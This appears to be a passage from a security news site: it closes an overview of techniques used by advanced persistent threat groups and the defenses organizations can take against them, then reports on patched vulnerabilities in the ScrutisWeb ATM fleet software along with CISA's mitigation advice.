Hardware-based attacks: APTs may use hardware-based attacks, such as compromising firmware, hardware implants, or manipulating peripheral devices, to gain persistence and evade traditional security measures. These attacks can be difficult to detect and remove without specialized tools and expertise. A notable example is the Equation Group‘s malware for reprogramming hard drives’ firmware.
Zero-day exploits: APTs may deploy zero-day exploits to target previously unknown vulnerabilities in software or hardware. These attacks can be highly effective as no patches or defenses against them are available. Who could forget the Stuxnet attack? Stuxnet was a sophisticated and targeted worm that exploited multiple zero-day vulnerabilities in industrial control systems, making it highly effective and challenging to detect.
Memory-based attacks: Memory-based attacks exploit vulnerabilities in software to gain access to sensitive data stored in the computer’s RAM. These attacks can bypass traditional security measures that focus on file-based threats. APT32, believed to be based in Vietnam, is known for using fileless malware and “living off the land” techniques to operate stealthily in the computer’s memory and evade traditional security measures.
DNS tunneling: APTs may use DNS tunneling to exfiltrate data from the victim’s network. This technique involves encoding data in DNS requests or responses, allowing the attackers to bypass perimeter security measures that may not inspect DNS traffic thoroughly. Cozy Bear used DNS tunneling to communicate with their command-and-control servers and steal sensitive information from targeted organizations in a stealthy manner.
Advanced anti-forensic techniques: APTs invest significant efforts in covering their tracks and erasing evidence of their presence. They may employ advanced anti-forensic techniques to delete logs, manipulate timestamps, or encrypt data to hinder investigation and response efforts. One well-known advanced anti-forensic techniques attack by the Equation Group involved using a rootkit called “DoubleFantasy” to hide and persistently maintain their presence on infected systems, making it extremely challenging for analysts to detect and analyze their activities.
Multi-platform or custom malware: APTs employ malware capable of targeting both Windows and macOS systems to maximize its reach. They can also deploy tailored malware, such as the Scanbox reconnaissance framework to gather intelligence. An example is APT1 (also known as Comment Crew or Unit 61398), which utilized custom malware to infiltrate and steal sensitive data from various organizations worldwide, particularly in the United States.
Password spraying: Password spraying attacks are used to gain initial access by attempting to use a few common passwords against multiple accounts. APT33 (Elfin) targeted organizations in the Middle East and globally, using password spraying to compromise email accounts and gain a foothold for further cyber-espionage activities.
APTs are here to stay
Organizations can make APT groups’ lives more difficult. Here’s how:
Defense-in-depth strategy: A comprehensive defense-in-depth strategy is crucial to combat APTs. This includes implementing multiple layers of security controls, such as strong perimeter defenses, network segmentation, endpoint protection, intrusion detection systems, data encryption, access controls, and continuous monitoring for anomalies.
Threat intelligence and sharing: Ideally, organizations should actively participate in threat intelligence sharing communities and collaborate with industry peers, government agencies, and security vendors. Sharing information about APTs and their techniques can help detect and mitigate attacks more effectively.
Employee education and awareness: Regular security awareness programs, phishing simulations, and training sessions can educate employees about the latest threats, social engineering techniques, and safe computing practices.
Incident response and recovery: Despite preventive measures, organizations should have a well-defined incident response plan. This includes incident detection, containment, eradication, and recovery procedures to minimize the impact of APT attacks and restore normal operations.
These TTPs underscore the diverse and advanced technical skills exhibited by different threat groups. Organizations can bolster their defenses and protect against APT incursions by studying their tactics, techniques, and procedures.
Continuous vigilance, threat intelligence, and incident response readiness are crucial elements in preparing for and sometimes thwarting these persistent and highly skilled adversaries. Understanding real-world APT attacks’ technical intricacies and TTPs is vital for organizations to enhance their defense strategies and safeguard against these persistent threats.
Researchers found several flaws in the ScrutisWeb ATM fleet monitoring software that can expose ATMs to hack.
Researchers from the Synack Red Team found multi flaws (CVE-2023-33871, CVE-2023-38257, CVE-2023-35763 and CVE-2023-35189) in the ScrutisWeb ATM fleet monitoring software that can be exploited to remotely hack ATMs.
ScrutisWeb software is developed by Lagona, it allows to remotely manage ATMs fleets. Operators can use the software to send and receive files to a device, modifying data, reboot a device or shut down a terminal.
The researchers discovered multiple vulnerabilities, including Absolute Path Traversal and Authorization Bypass Through User-Controlled Key issues, Hardcoded Cryptographic Key, and Unrestricted Upload of File with Dangerous Type.
Lagona addressed the vulnerabilities in July 2023 with the release of ScrutisWeb version 2.1.38.
The CVE-2023-33871 is an Absolute Path Traversal that an allow to download configurations, logs and databases from the server.
The CVE-2023-35189 is a Remote Code Execution that could be chained with the other issues to gain user access to the ATM controller.
The CVE-2023-38257 is an Insecure Direct Object Reference that can be exploited to retrieve information about all users on the system.ì, including administrators.
The CVE-2023-35763 is Hardcoded encryption key that can allow to retrieve Plaintext administrator credentials.
The US Cybersecurity and Infrastructure Security Agency (CISA) recently published an advisory for these vulnerabilities, the agency also provides the following recommendations:
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.
